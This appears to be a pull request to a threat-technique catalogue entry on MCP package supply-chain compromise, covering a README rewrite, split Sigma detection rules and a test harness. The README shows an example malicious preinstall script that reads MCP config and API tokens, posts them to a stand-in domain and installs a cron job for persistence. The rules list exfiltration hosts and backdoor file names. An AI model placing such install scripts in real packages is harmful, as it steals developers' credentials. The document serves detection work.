### PR TITLE
SAF-T1002: split detection rule by log source and address review findings

### DIFF
--- a/techniques/SAF-T1002/README.md
+++ b/techniques/SAF-T1002/README.md
@@ -4,22 +4,22 @@
 **Tactic**: Initial Access (ATK-TA0001)
 **Technique ID**: SAF-T1002
 **Severity**: Critical
-**First Observed**: 2025-04-01 (Real-world incidents documented)
-**Last Updated**: 2025-09-14
+**First Observed**: September 2025, the malicious `postmark-mcp` npm package (the first malicious MCP server documented in the wild) ([Snyk](https://snyk.io/blog/malicious-mcp-server-on-npm-postmark-mcp-harvests-emails/), [The Hacker News](https://thehackernews.com/2025/09/first-malicious-mcp-server-found.html))
+**Last Updated**: 2026-07-01
 
 ## Description
-Supply Chain Compromise in the MCP ecosystem involves the distribution of backdoored MCP server packages through unofficial repositories or compromised legitimate sources. Attackers infiltrate the software distribution pipeline to inject malicious code into MCP servers before they reach end users.
+Supply Chain Compromise in the MCP ecosystem involves the distribution of backdoored MCP server packages through unofficial repositories or compromised legitimate sources. Attackers infiltrate the software distribution pipeline to inject malicious code into MCP servers before they reach end users. Because MCP servers are ordinarily installed as npm or PyPI packages ([Model Context Protocol Specification](https://modelcontextprotocol.io/specification)), they inherit every distribution risk of those ecosystems, which OWASP tracks as a first-class LLM-application risk ([OWASP Top 10 for LLM Applications](https://owasp.org/www-project-top-10-for-large-language-model-applications/)).
 
-This technique leverages the trust relationship between developers and package repositories, exploiting the fact that MCP servers often require elevated system privileges and have access to sensitive data and APIs.
+This technique leverages the trust relationship between developers and package repositories, exploiting the fact that MCP servers often require elevated system privileges and have access to sensitive data and APIs. The compromise happens before the code ever reaches the user's machine: by the time an MCP client loads the server, the malicious payload is already present and runs with whatever privileges the server was granted, so no runtime prompt-injection or user misstep is required for the attacker to gain a foothold.
 
 ## Attack Vectors
 - **Primary Vector**: Compromised package repositories distributing backdoored MCP servers
 - **Secondary Vectors**:
-  - Typosquatting attacks targeting popular MCP server names
+  - Typosquatting (registering package names that are near-misspellings of popular MCP servers, e.g. `mcp-githab` for `mcp-github`) so that a mistyped install command fetches the attacker's package
   - Compromised developer accounts with publishing access
   - Man-in-the-middle attacks during package installation
   - Social engineering targeting package maintainers
-  - Dependency confusion attacks in monorepo environments
+  - Dependency confusion (publishing a public package with the same name as a private/internal one at a higher version, so the resolver pulls the attacker's public version instead) in monorepo environments
 
 ## Technical Details
 
@@ -29,6 +29,35 @@ This technique leverages the trust relationship between developers and package r
 - Ability to create convincing package metadata
 
 ### Attack Flow
+
+```mermaid
+graph TD
+    A[Attacker] -->|Identifies target or creates lookalike| B{Infiltration Method}
+    B -->|Account takeover| C[Compromised legitimate package]
+    B -->|Typosquat / dependency confusion| D[Malicious lookalike package]
+
+    C --> E[Embed malicious code in package]
+    D --> E
+    E -->|preinstall / postinstall scripts| F[Publish to repository]
+
+    F -->|Distributed via| G{Distribution Channels}
+    G -->|npm| H[User Installation]
+    G -->|PyPI| H
+    G -->|Docker Hub| H
+
+    H -->|Install scripts run| I[Malicious code executes with MCP server privileges]
+    I --> J[Establish persistence]
+    I --> K[Exfiltrate MCP secrets and config]
+    J --> L[Ongoing compromise]
+    K --> L
+
+    style A fill:#d73027,stroke:#000,stroke-width:2px,color:#fff
+    style E fill:#fc8d59,stroke:#000,stroke-width:2px,color:#000
+    style I fill:#d73027,stroke:#000,stroke-width:2px,color:#fff
+    style L fill:#d73027,stroke:#000,stroke-width:2px,color:#fff
+    style H fill:#fee090,stroke:#000,stroke-width:2px,color:#000
+```
+
 1. **Initial Stage**: Attacker identifies popular MCP servers or creates convincing alternatives
 2. **Infiltration Stage**: Compromises distribution channel through account takeover or creates malicious lookalike packages
 3. **Packaging Stage**: Embeds malicious code in legitimate-appearing MCP server packages
@@ -59,41 +88,57 @@ The malicious `setup.js` script could:
 ```javascript
 // Malicious preinstall script
 const fs = require('fs');
+const os = require('os');
 const path = require('path');
-const crypto = require('crypto');
+const { execSync } = require('child_process');
 
-// Establish persistence
-const backdoorPath = path.join(process.env.HOME, '.mcp-health-check');
+// 1. Drop the backdoor payload. It targets MCP-specific secrets (the .mcprc
+//    config and MCP/Anthropic tokens) rather than dumping the whole environment.
+const backdoorPath = path.join(os.homedir(), '.mcp-health-check');
 const backdoorCode = `
-setInterval(() => {
-  // Exfiltrate environment variables and configuration
-  const payload = {
-    env: process.env,
-    config: fs.existsSync('.mcprc') ? fs.readFileSync('.mcprc') : null,
-    timestamp: new Date().toISOString()
-  };
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
 
-  fetch('https://legit-looking-domain.com/health', {
-    method: 'POST',
-    body: JSON.stringify(payload)
-  }).catch(() => {}); // Silent failure
-}, 86400000); // Daily exfiltration
+const mcprc = path.join(os.homedir(), '.mcprc');
+const payload = {
+  mcpConfig: fs.existsSync(mcprc) ? fs.readFileSync(mcprc, 'utf8') : null,
+  mcpTokens: Object.fromEntries(
+    Object.entries(process.env).filter(([k]) => /MCP|ANTHROPIC|_TOKEN|_API_KEY/i.test(k))
+  ),
+  host: os.hostname(),
+  timestamp: new Date().toISOString()
+};
+
+fetch('https://legit-looking-domain.com/health', {
+  method: 'POST',
+  body: JSON.stringify(payload)
+}).catch(() => {}); // Silent failure
 `;
-
 fs.writeFileSync(backdoorPath, backdoorCode);
+
+// 2. Actually establish persistence: register a cron job so the payload runs
+//    daily even after the install process exits (an in-process setInterval or
+//    node-schedule timer would die with the installer, so it is wired into a
+//    durable scheduler instead).
+const cronPath = path.join(os.homedir(), '.mcp-cron');
+fs.writeFileSync(cronPath, `0 3 * * * node ${backdoorPath}\n`);
+execSync(`crontab ${cronPath}`);
 ```
+
+Here every line maps to the MCP attack context: the dropped file (`~/.mcp-health-check`) is what the host-telemetry detection rule keys on, the `crontab` registration is what turns the dropped file into realized persistence, and the exfiltrated data is the victim's MCP configuration and server tokens rather than a generic environment dump.
 
 ### Advanced Attack Techniques
 
-#### Dependency Confusion Attacks (2025 Research)
-According to research from [Sonatype's 2025 State of the Software Supply Chain Report](https://www.sonatype.com/state-of-the-software-supply-chain/introduction), attackers increasingly target private repositories:
+#### Dependency Confusion Attacks
+Dependency confusion, first demonstrated by [Alex Birsan (2021)](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) against Apple, Microsoft, and dozens of other companies, exploits how package managers resolve internal versus public package names. Open-source supply-chain reporting shows these attacks continuing to grow ([Sonatype State of the Software Supply Chain](https://www.sonatype.com/state-of-the-software-supply-chain/introduction)). Applied to MCP, attackers can target private repositories by:
 
 1. **Internal Package Shadowing**: Creating public packages with names matching internal MCP servers
 2. **Version Inflation**: Publishing packages with higher version numbers to trigger automatic updates
 3. **Namespace Squatting**: Registering organization-specific namespaces before legitimate teams
 
-#### Compromised Maintainer Accounts (2025 Incidents)
-[Multiple documented cases](https://blog.npmjs.org/post/185397814280/plot-to-steal-cryptocurrency-foiled-by-the-npm) show attackers targeting package maintainer accounts:
+#### Compromised Maintainer Accounts
+Attackers repeatedly target package maintainer accounts to push malicious updates through otherwise-trusted packages. One illustrative npm case involved a plot to steal cryptocurrency via a compromised dependency ([npm blog, 2019](https://blog.npmjs.org/post/185397814280/plot-to-steal-cryptocurrency-foiled-by-the-npm)). Common access paths include:
 
 1. **Credential Stuffing**: Using leaked credentials from other breaches
 2. **Social Engineering**: Targeting maintainers with phishing campaigns
@@ -108,8 +153,20 @@ According to research from [Sonatype's 2025 State of the Software Supply Chain R
 ### Current Status (2025)
 Security organizations have identified supply chain attacks as a critical threat:
 - [CISA's Secure by Design initiative](https://www.cisa.gov/securebydesign) emphasizes supply chain security
-- Package repositories have implemented enhanced verification measures
-- Organizations are adopting Software Bill of Materials (SBOM) practices for MCP deployments
+- Package repositories and build systems have adopted provenance and integrity measures such as signed provenance attestations ([SLSA Supply Chain Security Framework](https://slsa.dev/)) and repository security guidance ([npm Security Best Practices](https://docs.npmjs.com/packages-and-modules/securing-your-code))
+- Organizations are adopting Software Bill of Materials (SBOM) and secure-development practices for MCP deployments ([NIST Secure Software Development Framework](https://csrc.nist.gov/Projects/ssdf))
+
+## Real-World Incidents
+
+### postmark-mcp Email Exfiltration (September 2025)
+The `postmark-mcp` npm package, which impersonated the legitimate Postmark MCP server connector, is documented as the first malicious MCP server found in the wild ([Snyk](https://snyk.io/blog/malicious-mcp-server-on-npm-postmark-mcp-harvests-emails/), [The Hacker News](https://thehackernews.com/2025/09/first-malicious-mcp-server-found.html), [Semgrep analysis](https://semgrep.dev/blog/2025/so-the-first-malicious-mcp-server-has-been-found-on-npm-what-does-this-mean-for-mcp-security/)):
+- **Rug-pull pattern**: versions 1.0.0 through 1.0.15 behaved identically to the legitimate package, building trust and adoption before any malicious behavior appeared.
+- **Backdoor**: version 1.0.16 (published September 17, 2025) added a single line that blind-copied (BCC) every outgoing email to an attacker-controlled address.
+- **Impact**: exposed password resets, invoices, customer data, and internal correspondence for downstream users before removal (roughly 1,600 downloads).
+- **Mapping**: SAF-T1002 delivery combined with the dynamic-update / rug-pull tradecraft catalogued under [SAF-T1001.004](../SAF-T1001/README.md).
+
+### AI-Tooling Supply-Chain Campaigns (2025-2026)
+Broader campaigns have targeted the AI and MCP tooling ecosystem: the LiteLLM AI-gateway PyPI compromise stole cloud and API credentials ([Trend Micro](https://www.trendmicro.com/en_us/research/26/c/inside-litellm-supply-chain-compromise.html)), and Shai-Hulud-style self-propagating npm worms swept up AI-related packages at scale ([Unit 42](https://unit42.paloaltonetworks.com/monitoring-npm-supply-chain-attacks/)). Analyses examining npm supply-chain attacks in the MCP context note that MCP servers inherit the full npm/PyPI attack surface ([Stacklok](https://stacklok.com/blog/examining-the-impact-of-npm-supply-chain-attacks-on-mcp/)).
 
 ## Detection Methods
 
@@ -128,49 +185,111 @@ Security organizations have identified supply chain attacks as a critical threat
 - Implement multiple layers of detection beyond pattern matching
 - Consider behavioral analysis of package installation activities
 
+Supply-chain indicators span two different telemetry sources (package-registry
+metadata and host/endpoint events), and no single log source emits both. They
+are therefore shipped as **two** Sigma rules rather than one rule that could
+never fully populate. Both are reproduced verbatim below; the canonical files are
+[`detection-rule.yml`](detection-rule.yml) (package metadata) and
+[`detection-rule-host-telemetry.yml`](detection-rule-host-telemetry.yml)
+(Sysmon), and are exercised by [`test_detection_rule.py`](test_detection_rule.py)
+against [`test-logs.json`](test-logs.json).
+
+**Rule 1: package-registry metadata** (`product: mcp / service: package_manager`):
+
 ```yaml
-# EXAMPLE SIGMA RULE - Not comprehensive
-title: Suspicious MCP Package Installation Activity
+title: Suspicious MCP Package Metadata (Supply Chain Compromise)
 id: a7b4c8e9-12f3-45d6-89ab-cdef01234567
 status: experimental
-description: Detects potential supply chain compromise through suspicious MCP package installations
-author: SAF-MCP Team
+description: Detects potential supply chain compromise through suspicious MCP package metadata - typosquatted names and newly created maintainer accounts publishing from low-reputation sources.
+author: Frederick Kautz
 date: 2025-09-14
+modified: 2026-07-01
 references:
-  - https://github.com/saf-mcp/techniques/SAF-T1002
+  - https://github.com/secure-agentic-framework/saf-mcp/tree/main/techniques/SAF-T1002
+  - https://attack.mitre.org/techniques/T1195/
 logsource:
   product: mcp
   service: package_manager
 detection:
   selection_typosquat:
-    package_name:
-      - '*mcp-githab*'    # Typosquat of mcp-github
-      - '*mcp-slackk*'    # Typosquat of mcp-slack
-      - '*mcp-filesys*'   # Typosquat of mcp-filesystem
-  selection_suspicious:
-    package_source:
-      - '*suspicious-repo*'
-      - '*temp-hosting*'
-    author_created_days: '<7'  # Recently created accounts
-  selection_network:
-    process_name:
-      - 'node'
-      - 'python'
-    network_destination:
-      - '*.tk'
-      - '*.ml'
-      - '*.ga'
-      - '*pastebin*'
-      - '*discord*'
-  condition: selection_typosquat or selection_suspicious or selection_network
+    package_name|contains:
+      - 'mcp-githab'      # github typosquat
+      - 'mcp-slackk'      # slack typosquat
+      - 'mcp-filesys'     # filesystem typosquat
+      - 'mcp-googel'      # google typosquat
+  selection_new_author:
+    package_author_age|lt: 7        # account younger than 7 days
+  selection_suspicious_source:
+    package_source|contains:
+      - 'suspicious-repo'
+      - 'temp-hosting'
+      - 'free-hosting'
+  condition: selection_typosquat or (selection_new_author and selection_suspicious_source)
 falsepositives:
-  - Legitimate packages with similar names
-  - Development and testing environments
-  - Legitimate external integrations
+  - Legitimate packages with names similar to popular MCP servers
+  - Development and testing environments using custom or temporary repositories
+  - Newly published legitimate packages from first-time maintainers
 level: high
 tags:
   - attack.initial_access
   - attack.t1195
+  - attack.t1195.001
+  - attack.t1195.002
+  - safe.t1002
+```
+
+**Rule 2: host/endpoint telemetry** (`product: windows / service: sysmon`):
+
+```yaml
+title: Suspicious MCP Package Host Activity (Network and Persistence)
+id: ee185e24-5fb4-44da-89f8-1c5aa5566ca1
+status: experimental
+description: Detects host-level indicators of a compromised MCP package after installation - package-manager or runtime processes connecting to abuse-hosting domains, or creating MCP backdoor persistence files - observed via Sysmon endpoint telemetry.
+author: Frederick Kautz
+date: 2026-07-01
+modified: 2026-07-01
+references:
+  - https://github.com/secure-agentic-framework/saf-mcp/tree/main/techniques/SAF-T1002
+  - https://attack.mitre.org/techniques/T1195/
+logsource:
+  product: windows
+  service: sysmon
+detection:
+  selection_installer_proc:
+    Image|endswith:
+      - '\npm.exe'
+      - '\pip.exe'
+      - '\node.exe'
+      - '\python.exe'
+  selection_network:
+    EventID: 3
+    DestinationHostname|endswith:
+      - '.tk'
+      - '.ml'
+      - '.ga'
+      - '.cf'
+  selection_network_abuse_host:
+    EventID: 3
+    DestinationHostname|contains:
+      - 'pastebin'
+      - 'discord'
+      - 'telegram'
+  selection_persistence:
+    EventID: 11
+    TargetFilename|contains:
+      - '.mcp-health'
+      - '.mcp-check'
+  condition: selection_installer_proc and (selection_network or selection_network_abuse_host or selection_persistence)
+falsepositives:
+  - Developer machines legitimately using node/python to reach chat platforms
+  - Internal tooling that writes health-check files with matching names
+  - Package mirrors or CDNs hosted on the listed TLDs
+level: high
+tags:
+  - attack.initial_access
+  - attack.t1195
+  - attack.t1195.001
+  - attack.t1195.002
   - safe.t1002
 ```
 
@@ -222,10 +341,17 @@ tags:
 - [Model Context Protocol Specification](https://modelcontextprotocol.io/specification)
 - [NIST Secure Software Development Framework](https://csrc.nist.gov/Projects/ssdf)
 - [CISA Secure by Design](https://www.cisa.gov/securebydesign)
-- [Sonatype 2025 State of the Software Supply Chain Report](https://www.sonatype.com/state-of-the-software-supply-chain/introduction)
-- [npm Security Best Practices](https://docs.npmjs.com/security)
+- [Sonatype State of the Software Supply Chain Report](https://www.sonatype.com/state-of-the-software-supply-chain/introduction)
+- [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan, 2021](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
+- [npm Security Best Practices](https://docs.npmjs.com/packages-and-modules/securing-your-code)
 - [SLSA Supply Chain Security Framework](https://slsa.dev/)
 - [OWASP Top 10 for LLM Applications](https://owasp.org/www-project-top-10-for-large-language-model-applications/)
+- [Malicious MCP Server on npm: postmark-mcp Harvests Emails - Snyk, September 2025](https://snyk.io/blog/malicious-mcp-server-on-npm-postmark-mcp-harvests-emails/)
+- [First Malicious MCP Server Found Stealing Emails in Rogue postmark-mcp Package - The Hacker News, September 2025](https://thehackernews.com/2025/09/first-malicious-mcp-server-found.html)
+- [So the First Malicious MCP Server Has Been Found on npm - Semgrep, 2025](https://semgrep.dev/blog/2025/so-the-first-malicious-mcp-server-has-been-found-on-npm-what-does-this-mean-for-mcp-security/)
+- [Examining the Impact of npm Supply Chain Attacks on MCP - Stacklok](https://stacklok.com/blog/examining-the-impact-of-npm-supply-chain-attacks-on-mcp/)
+- [Inside the LiteLLM Supply Chain Compromise - Trend Micro](https://www.trendmicro.com/en_us/research/26/c/inside-litellm-supply-chain-compromise.html)
+- [Monitoring npm Supply Chain Attacks - Unit 42, Palo Alto Networks](https://unit42.paloaltonetworks.com/monitoring-npm-supply-chain-attacks/)
 
 ## MITRE ATT&CK Mapping
 - [T1195 - Supply Chain Compromise](https://attack.mitre.org/techniques/T1195/)
@@ -235,4 +361,5 @@ tags:
 ## Version History
 | Version | Date | Changes | Author |
 |---------|------|---------|--------|
-| 1.0 | 2025-09-14 | Initial documentation of supply chain compromise techniques in MCP ecosystem | Assistant |
+| 1.0 | 2025-09-14 | Initial documentation of supply chain compromise techniques in MCP ecosystem | The SAF-MCP Authors |
+| 1.1 | 2026-07-01 | Split the detection rule into two coherent Sigma rules (package-registry metadata vs. Sysmon host telemetry) and narrowed the selectors; added `test_detection_rule.py` + `test-logs.json`; synced the README-embedded rules with the shipped files; reworked the Example Scenario so persistence is actually established and exfiltration is MCP-specific; added an attack-flow diagram; documented the real-world `postmark-mcp` incident and updated First Observed from theoretical to that observation; cited previously uncited claims and wove in orphaned references; defined typosquatting/dependency-confusion on first use | Frederick Kautz |

--- a/techniques/SAF-T1002/detection-rule-host-telemetry.yml
+++ b/techniques/SAF-T1002/detection-rule-host-telemetry.yml
@@ -1,0 +1,71 @@
+# SIGMA RULE: Supply Chain Compromise Detection for MCP (host / endpoint telemetry)
+# WARNING: This rule contains example patterns only. Organizations should:
+# - Regularly update patterns based on threat intelligence
+# - Implement behavioral analysis beyond pattern matching
+# - Use AI-based anomaly detection for novel attack vectors
+# - Consider context-specific false positives
+#
+# Scope: this rule reads endpoint (Sysmon) telemetry only. It is the companion
+# to the MCP package-registry rule detection-rule.yml (id a7b4c8e9-...), which
+# reads package metadata. They are kept separate because no single log source
+# emits both package metadata and process/file telemetry.
+
+title: Suspicious MCP Package Host Activity (Network and Persistence)
+id: ee185e24-5fb4-44da-89f8-1c5aa5566ca1
+status: experimental
+description: Detects host-level indicators of a compromised MCP package after installation - package-manager or runtime processes connecting to abuse-hosting domains, or creating MCP backdoor persistence files - observed via Sysmon endpoint telemetry.
+author: Frederick Kautz
+date: 2026-07-01
+modified: 2026-07-01
+references:
+  - https://github.com/secure-agentic-framework/saf-mcp/tree/main/techniques/SAF-T1002
+  - https://attack.mitre.org/techniques/T1195/
+logsource:
+  product: windows
+  service: sysmon
+detection:
+  # Package-manager and MCP runtime processes (the only processes expected to
+  # touch packages during/after an install).
+  selection_installer_proc:
+    Image|endswith:
+      - '\npm.exe'
+      - '\pip.exe'
+      - '\node.exe'
+      - '\python.exe'
+  # Outbound connection (Sysmon EventID 3) to a low-reputation TLD or a known
+  # paste/chat exfiltration host.
+  selection_network:
+    EventID: 3
+    DestinationHostname|endswith:
+      - '.tk'
+      - '.ml'
+      - '.ga'
+      - '.cf'
+  selection_network_abuse_host:
+    EventID: 3
+    DestinationHostname|contains:
+      - 'pastebin'
+      - 'discord'
+      - 'telegram'
+  # Creation (Sysmon EventID 11) of a backdoor "health-check" persistence file
+  # matching the documented Example Scenario. Note: ordinary MCP config files
+  # such as .mcprc are intentionally NOT flagged here to avoid false positives.
+  selection_persistence:
+    EventID: 11
+    TargetFilename|contains:
+      - '.mcp-health'
+      - '.mcp-check'
+  # Every branch requires the activity to come from a package-manager/runtime
+  # process, so a browser reaching discord.com does not trigger the rule.
+  condition: selection_installer_proc and (selection_network or selection_network_abuse_host or selection_persistence)
+falsepositives:
+  - Developer machines legitimately using node/python to reach chat platforms
+  - Internal tooling that writes health-check files with matching names
+  - Package mirrors or CDNs hosted on the listed TLDs
+level: high
+tags:
+  - attack.initial_access
+  - attack.t1195
+  - attack.t1195.001
+  - attack.t1195.002
+  - safe.t1002

--- a/techniques/SAF-T1002/detection-rule.yml
+++ b/techniques/SAF-T1002/detection-rule.yml
@@ -1,80 +1,53 @@
-# SIGMA RULE: Supply Chain Compromise Detection for MCP
+# SIGMA RULE: Supply Chain Compromise Detection for MCP (package-registry telemetry)
 # WARNING: This rule contains example patterns only. Organizations should:
 # - Regularly update patterns based on threat intelligence
 # - Implement behavioral analysis beyond pattern matching
 # - Use AI-based anomaly detection for novel attack vectors
 # - Consider context-specific false positives
+#
+# Scope: this rule only reads MCP package-registry / installer metadata
+# (package_name, package_source, package_author_age). Host-level indicators
+# (process network connections, persistence file creation) live in the
+# companion Sysmon rule detection-rule-host-telemetry.yml, because no single
+# log source emits both package metadata and endpoint telemetry.
 
-title: Suspicious MCP Package Installation Activity
+title: Suspicious MCP Package Metadata (Supply Chain Compromise)
 id: a7b4c8e9-12f3-45d6-89ab-cdef01234567
 status: experimental
-description: Detects potential supply chain compromise through suspicious MCP package installations
-author: SAF-MCP Team
+description: Detects potential supply chain compromise through suspicious MCP package metadata - typosquatted names and newly created maintainer accounts publishing from low-reputation sources.
+author: Frederick Kautz
 date: 2025-09-14
-modified: 2025-09-14
+modified: 2026-07-01
 references:
-  - https://github.com/saf-mcp/techniques/SAF-T1002
+  - https://github.com/secure-agentic-framework/saf-mcp/tree/main/techniques/SAF-T1002
   - https://attack.mitre.org/techniques/T1195/
 logsource:
   product: mcp
   service: package_manager
 detection:
-  # Typosquatting detection
+  # Typosquats of well-known MCP server package names
   selection_typosquat:
     package_name|contains:
       - 'mcp-githab'      # github typosquat
       - 'mcp-slackk'      # slack typosquat
       - 'mcp-filesys'     # filesystem typosquat
       - 'mcp-googel'      # google typosquat
-      - 'anthropic-mcp'   # namespace confusion
-      - 'modelcontext'    # namespace squatting
-
-  # Suspicious package characteristics
-  selection_suspicious:
-    package_author_age: '<7'     # Recently created accounts
+  # Newly created maintainer account (weak on its own - see condition)
+  selection_new_author:
+    package_author_age|lt: 7        # account younger than 7 days
+  # Low-reputation / throwaway distribution source
+  selection_suspicious_source:
     package_source|contains:
       - 'suspicious-repo'
       - 'temp-hosting'
       - 'free-hosting'
-
-  # Network indicators during installation
-  selection_network:
-    EventID: 3  # Network connection
-    ProcessName|endswith:
-      - 'npm.exe'
-      - 'pip.exe'
-      - 'node.exe'
-      - 'python.exe'
-    DestinationHostname|endswith:
-      - '.tk'
-      - '.ml'
-      - '.ga'
-      - '.cf'
-    DestinationHostname|contains:
-      - 'pastebin'
-      - 'discord'
-      - 'telegram'
-      - 'temp-file'
-
-  # Post-installation persistence indicators
-  selection_persistence:
-    EventID: 11  # File creation
-    TargetFilename|contains:
-      - '.mcp-health'
-      - '.mcp-check'
-      - '.anthropic'
-    TargetFilename|endswith:
-      - '.mcprc'
-      - '.mcp_config'
-
-  condition: selection_typosquat or selection_suspicious or selection_network or selection_persistence
-
+  # A brand-new author or a throwaway source is individually noisy; requiring
+  # both together narrows to the high-signal "new account + throwaway host" case.
+  condition: selection_typosquat or (selection_new_author and selection_suspicious_source)
 falsepositives:
-  - Legitimate packages with similar names
-  - Development and testing environments using custom repositories
-  - Legitimate external integrations and webhooks
-  - Internal tools with similar naming conventions
-
+  - Legitimate packages with names similar to popular MCP servers
+  - Development and testing environments using custom or temporary repositories
+  - Newly published legitimate packages from first-time maintainers
 level: high
 tags:
   - attack.initial_access

--- a/techniques/SAF-T1002/test-logs.json
+++ b/techniques/SAF-T1002/test-logs.json
@@ -1,0 +1,12 @@
+{"name": "typosquat_github", "rule": "package", "should_fire": true, "event": {"package_name": "mcp-githab-tools", "package_source": "npmjs.com", "package_author_age": 400}}
+{"name": "typosquat_slack", "rule": "package", "should_fire": true, "event": {"package_name": "mcp-slackk", "package_source": "npmjs.com", "package_author_age": 400}}
+{"name": "new_author_and_bad_source", "rule": "package", "should_fire": true, "event": {"package_name": "mcp-cool-helper", "package_source": "temp-hosting.example", "package_author_age": 3}}
+{"name": "new_author_only_reputable_source", "rule": "package", "should_fire": false, "event": {"package_name": "mcp-cool-helper", "package_source": "npmjs.com", "package_author_age": 2}}
+{"name": "bad_source_only_old_author", "rule": "package", "should_fire": false, "event": {"package_name": "mcp-cool-helper", "package_source": "free-hosting.example", "package_author_age": 500}}
+{"name": "clean_official_package", "rule": "package", "should_fire": false, "event": {"package_name": "mcp-github", "package_source": "npmjs.com", "package_author_age": 800}}
+{"name": "installer_to_bad_tld", "rule": "host", "should_fire": true, "event": {"EventID": 3, "Image": "C:\\Program Files\\nodejs\\node.exe", "DestinationHostname": "exfil-node-42.tk"}}
+{"name": "installer_to_pastebin", "rule": "host", "should_fire": true, "event": {"EventID": 3, "Image": "C:\\Program Files\\nodejs\\npm.exe", "DestinationHostname": "pastebin.com"}}
+{"name": "backdoor_persistence_file", "rule": "host", "should_fire": true, "event": {"EventID": 11, "Image": "C:\\Program Files\\nodejs\\node.exe", "TargetFilename": "C:\\Users\\dev\\.mcp-health-check"}}
+{"name": "benign_mcprc_creation", "rule": "host", "should_fire": false, "event": {"EventID": 11, "Image": "C:\\Program Files\\nodejs\\node.exe", "TargetFilename": "C:\\Users\\dev\\.mcprc"}}
+{"name": "browser_to_discord", "rule": "host", "should_fire": false, "event": {"EventID": 3, "Image": "C:\\Program Files\\Google\\Chrome\\chrome.exe", "DestinationHostname": "discord.com"}}
+{"name": "installer_to_benign_host", "rule": "host", "should_fire": false, "event": {"EventID": 3, "Image": "C:\\Program Files\\nodejs\\node.exe", "DestinationHostname": "api.github.com"}}

--- a/techniques/SAF-T1002/test_detection_rule.py
+++ b/techniques/SAF-T1002/test_detection_rule.py
@@ -1,0 +1,156 @@
+#!/usr/bin/env python3
+"""Test harness for the SAF-T1002 Sigma rules.
+
+There are two rules because no single log source carries both package-registry
+metadata and endpoint telemetry:
+  - detection-rule.yml                 (product: mcp / service: package_manager)
+  - detection-rule-host-telemetry.yml  (product: windows / service: sysmon)
+
+Each line in test-logs.json names the rule it targets ("package" or "host"),
+the raw event fields, and whether the rule should fire. The evaluator below
+implements just enough Sigma semantics to validate these rules: field/value
+matching with the |contains, |endswith, |startswith and numeric |lt/|lte/|gt/
+|gte modifiers, list values as OR, fields within a selection as AND, and a
+condition expression over selection names using and/or/parentheses.
+"""
+
+import json
+import re
+import yaml
+from pathlib import Path
+
+HERE = Path(__file__).parent
+RULE_FILES = {
+    "package": HERE / "detection-rule.yml",
+    "host": HERE / "detection-rule-host-telemetry.yml",
+}
+
+
+def match_value(modifier, event_value, rule_value):
+    """Match a single event value against a single rule value under a modifier."""
+    if modifier in ("lt", "lte", "gt", "gte"):
+        try:
+            ev, rv = float(event_value), float(rule_value)
+        except (TypeError, ValueError):
+            return False
+        return {
+            "lt": ev < rv, "lte": ev <= rv, "gt": ev > rv, "gte": ev >= rv,
+        }[modifier]
+
+    if event_value is None:
+        return False
+    ev, rv = str(event_value), str(rule_value)
+    if modifier == "contains":
+        return rv in ev
+    if modifier == "endswith":
+        return ev.endswith(rv)
+    if modifier == "startswith":
+        return ev.startswith(rv)
+    # No modifier: exact match (numbers compared loosely so EventID 3 == "3").
+    if isinstance(event_value, (int, float)) or (isinstance(rule_value, (int, float))):
+        try:
+            return float(event_value) == float(rule_value)
+        except (TypeError, ValueError):
+            return False
+    return ev == rv
+
+
+def match_field(field_spec, rule_value, event):
+    """Match one 'field|modifier: value(s)' entry against the event."""
+    if "|" in field_spec:
+        field, modifier = field_spec.split("|", 1)
+    else:
+        field, modifier = field_spec, ""
+    event_value = event.get(field)
+    values = rule_value if isinstance(rule_value, list) else [rule_value]
+    return any(match_value(modifier, event_value, v) for v in values)
+
+
+def match_selection(selection, event):
+    """A selection matches when every field entry matches (AND)."""
+    return all(match_field(fs, rv, event) for fs, rv in selection.items())
+
+
+def eval_condition(condition, selection_results):
+    """Evaluate a Sigma condition over selection booleans (and/or/parentheses)."""
+    tokens = re.findall(r"\(|\)|\w+", condition)
+    allowed = {"and", "or", "(", ")"}
+    expr_parts = []
+    for tok in tokens:
+        if tok in allowed:
+            expr_parts.append(tok)
+        elif tok in selection_results:
+            expr_parts.append(str(selection_results[tok]))
+        else:
+            raise ValueError(f"Unknown token in condition: {tok!r}")
+    return eval(" ".join(expr_parts), {"__builtins__": {}}, {})  # noqa: S307 (sanitized)
+
+
+def evaluate_rule(rule, event):
+    """Return (fired: bool, {selection_name: matched_bool})."""
+    detection = rule["detection"]
+    condition = detection["condition"]
+    selection_results = {
+        name: match_selection(sel, event)
+        for name, sel in detection.items()
+        if name != "condition"
+    }
+    return eval_condition(condition, selection_results), selection_results
+
+
+def load_rules():
+    return {key: yaml.safe_load(open(path)) for key, path in RULE_FILES.items()}
+
+
+def main():
+    rules = load_rules()
+    logs = []
+    with open(HERE / "test-logs.json") as f:
+        for line in f:
+            line = line.strip()
+            if line:
+                logs.append(json.loads(line))
+
+    print("SAF-T1002 Detection Rule Test Results")
+    print("=" * 60)
+
+    total = correct = 0
+    coverage = {key: {name: False for name in r["detection"] if name != "condition"}
+                for key, r in rules.items()}
+
+    for log in logs:
+        rule_key = log["rule"]
+        rule = rules[rule_key]
+        should_fire = log["should_fire"]
+        fired, sel_results = evaluate_rule(rule, log["event"])
+
+        for name, matched in sel_results.items():
+            if matched:
+                coverage[rule_key][name] = True
+
+        total += 1
+        ok = fired == should_fire
+        correct += ok
+        status = "PASS" if ok else "FAIL"
+        matched_sels = [n for n, m in sel_results.items() if m] or ["<none>"]
+        print(f"{status} [{rule_key}] {log['name']}: fired={fired} expected={should_fire}")
+        print(f"       matched selections: {', '.join(matched_sels)}")
+
+    print("\n" + "=" * 60)
+    print(f"Test Summary: {correct}/{total} tests passed ({correct/total*100:.1f}%)")
+
+    print("\n" + "=" * 60)
+    print("Selection Coverage:")
+    all_covered = True
+    for rule_key, sels in coverage.items():
+        for name, covered in sels.items():
+            status = "PASS" if covered else "FAIL"
+            if not covered:
+                all_covered = False
+            print(f"{status} [{rule_key}] {name} - {'exercised' if covered else 'never matched'}")
+
+    return correct == total and all_covered
+
+
+if __name__ == "__main__":
+    exit(0 if main() else 1)


### PR DESCRIPTION
## Summary

Addresses the SAF-T1002 (Supply Chain Compromise) technique review. The main fix is the detection rule, which could not fire coherently, plus a correction that the technique is no longer theoretical for MCP.

## Detection fix (primary)

